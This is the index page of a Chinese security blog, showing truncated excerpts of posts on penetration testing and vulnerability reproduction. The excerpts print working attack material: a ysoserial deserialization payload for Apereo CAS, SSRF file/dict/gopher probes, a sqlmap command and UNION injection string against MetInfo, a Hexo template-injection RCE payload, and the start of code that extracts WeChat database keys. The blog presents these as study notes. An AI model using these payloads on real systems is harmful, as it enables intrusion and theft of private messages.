avatar
文章
67
标签
28
分类
0

主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者
c0ll4r
搜索
主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者

c0ll4r

蓝方视角下的getshell
发表于2023-12-08
background客户让我测测内网,我对内网环境一无所知,也懒得弄,就随便给它看看。我就只看设备上的告警,然后对着ip去测。 apereo cas默认秘钥反序列化getshell设备上看到的告警,内网对内网的,问题不大。以前从来没见过这个洞,于是去测这个漏洞,态势感知就是根据请求包里execution参数特征来识别的。该漏洞源于apereo cas使用了默认的秘钥,导致攻击者可以构造恶意代码,在反序列化的过程中达到命令执行的效果。 漏洞利用工具https://github.com/MrMeizhi/ysoserial-mangguogan/blob/master/ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar利用该工具生成payloadjava -jar .\ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar encode CommonsCollections4 将生成的结果复制到请求包的execution参数中,在请求头中添加cmd:whoami即可执行“whoami”系统命令修复建议:升级软件版本或者 ...
ssrf的一些利用方式
发表于2023-12-08
background之前通过国光师傅的靶场学习过ssrf的一些打法,在前几天暗月师傅的中秋打靶活动中用到了ssrf打me来getshell。我也是第一次接触到ssrf打me,于是就好好的记录一下ssrf的打法,发到我的blog上,以下大多数内容都是去年11月份完成的。靶场地址:https://github.com/sqlsec/ssrf-vuls原文链接:https://www.sqlsec.com/2021/05/ssrf.html 靶场拓扑图这是靶场的拓扑图,就是用一个ssrf的点位来打内网的这些服务。 漏洞点 获取网段信息file:///etc/hosts高权限还可以读取/proc/net/arp/etc/network/interfaces 探测存活使用dict协议可判断端口是否开放dict://182.168.1.1:80 172.172.0.25(文件上传)别人新增的环境文件上传这里上传文件 是要用到post请求的 所以需要使用gopher协议来进行请求构造请求包 POST /index.php HTTP/1.1Host: 172.172.0.25Us ...
记一次有意思的'攻防演练'
发表于2023-12-07
background去了某场比赛当了某单位的指导老师,全程都是事故,结果也没有达到预期,弱爆了。本来计划中的发展是第一天开始,第二天15:00结束,第一天我按时赶到,然后中午撤。有位大哥来给我顶着。大哥早上都上了高铁,然后单位有事就给他叫回去了。那我肯定就是回不去了。第一天开打我们扫描器一点资产都扫不到,第二天才发下是网络开放的问题,然后给我们加时……就给了个B段的内网地址,自己搜集资产。全是水洞,没啥技术含量我就不记录了,有个我们没做出来的springboot很有意思,我之前也没打过springboot。恶心就恶心在你知道靶机是springboot,但你不知道哪个是靶机,不知道自己看到的是靶机还是业务系统。 CVE-20222-2965确定靶机是这个洞,我们当时也找了个springboot,扫描器也告警了,就是这样的 然后当时全部是内网,我得把poc打包到txt里然后给运维,运维上堡垒机把东西传给我们。我在网上找了几个poc,还找了个利用工具,反正都没打通。我在burp里手动发包,都没效果,shell写不进去,就很奇怪。 我在github上看了扫描器源码里的poc(https:/ ...
获取windows微信聊天记录(持续更新偏移地址)
发表于2023-12-07
background昨天看到篇文章写的实战中各种密码凭证的获取,其中包括了钓鱼运维然后从微信中获取敏感信息。这一直是我比较感兴趣的模块。在这之前微信聊天记录的数字化我只会聊天记录备份到模拟器然后再解密。说实话没啥太大的应用空间,不管是实战还是取证也好,这个手段都是不现实的。文章里写的手法是直接上windows,然后拿key解密数据库,这确实是一种高效实用的办法。 获取秘钥微信聊天记录数据库存在了wxid_xxxxxxxxxx/msg/Multi/MSG*.db(数据库每达到270m就会生成一个新的,*就是数据库的编号)引导文件是wxid_xxxxxxxxxx/msg/MicroMsg.db我们要做的就是获取到数据库的秘钥,不同版本的windows微信偏移地址不一样。C#编译成exe命令 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc test.cs 源代码 using System;using System.Collections.Generic;using System.Diagn ...
metinfo5.0.4 RCE
发表于2023-12-05
background某次线下赛遇见的,然后就想着复盘一下。版本是metinfo5.0.4,我找这个版本找了老一会,后面别人跟我说5.0.4这个版本是4.0升级上去的,所以先装4.0再装5.0.4。 https://www.metinfo.cn/faq/1519.html 此文没任何技术含量,我太菜了,就仅仅是做个学习记录。 前台sql注入漏洞sqlmap命令python sqlmap.py -u "http://metinfo.com/about/show.php?lang=cn&id=15" --dbs --batch explang=cn&id=-2506 UNION ALL SELECT 68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,CONCAT(0x7170706b71,0x6a58425864747852627a625169766a5643464650676e7170775871566e59585279484263744f496c,0x71716b7871),68, ...
hexo的rce
发表于2023-11-26
{{joiner.constructor(“global.process.mainModule.require(‘child_process’).exec(‘Calc.exe’)”)() }} 很鸡肋的洞,不能直接带来啥大的危害。 https://gem-love.com/2023/07/25/hexo%E5%8D%9A%E5%AE%A2%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
我的新博客
发表于2023-11-24
backgroundhexo搭建安装git https://git-scm.com/downloads 安装nodejs https://nodejs.org/en/ 换源 npm config set registry http://registry.npm.taobao.org/ 安装(找一个文件夹存放博客的文件,右键-open git bash) npm install hexo-cli -ghexo inithexo s 主题美化安装各种依赖环境,我这里就直接安所有的包了,直接替换掉package.json里的内容,然后在目录下npm install { "name": "hexo-site", "version": "0.0.0", "private": true, "scripts": { "build": "hexo generate", "clean&qu ...
1…67
avatar
c0ll4r
文章
67
标签
28
分类
0
公告
Email:root@pwns.fun
最新文章
第21届湖南省大学生计算机程序设计竞赛网络安全赛2025-10-14
win下redis写jsp的shell2025-07-23
ctfshow终极考核2025-06-28
上帝给你关了一扇门,他会打开一扇窗2025-05-01
红日32025-03-10
标签
xss ssti springboot 攻防演练 ssrf awd 内网 rce 代码审计 crypto python vulhub 文件包含 jwt 碎碎念 C 内网渗透 other nodejs sql注入 ctf 权限提升 渗透测试 java安全 漏洞复现 poc d web
归档
  • 十月 20251
  • 七月 20251
  • 六月 20251
  • 五月 20251
  • 三月 20251
  • 二月 20255
  • 一月 20251
  • 十二月 20247
网站资讯
文章数目 :
67
本站总字数 :
83.2k
最后更新时间 :
©2020 - 2025 By c0ll4r
框架 Hexo|主题 Butterfly
湘ICP备2023001513号 湘公网安备 43310102000328号
搜索
数据库加载中